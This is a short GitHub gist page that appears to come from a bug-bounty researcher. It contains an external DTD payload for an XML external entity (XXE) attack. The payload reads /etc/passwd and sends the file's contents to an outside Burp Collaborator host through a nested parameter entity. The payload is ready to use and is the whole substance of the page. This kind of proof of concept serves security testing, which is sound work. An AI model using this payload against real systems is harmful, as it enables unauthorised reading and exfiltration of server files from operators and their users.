Skip to content

Instantly share code, notes, and snippets.

@nahamsec
Last active Dec 4, 2020
Embed
What would you like to do?
<!ENTITY % xxePOC SYSTEM "file:///etc/passwd">
<!ENTITY % exfildata "<!ENTITY &#x25; exfil SYSTEM 'http://7u2bvf9vu78d9wepre2c3qmg87e82x.burpcollaborator.net/?x=%xxePOC;'>">
%exfildata;
%exfil;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment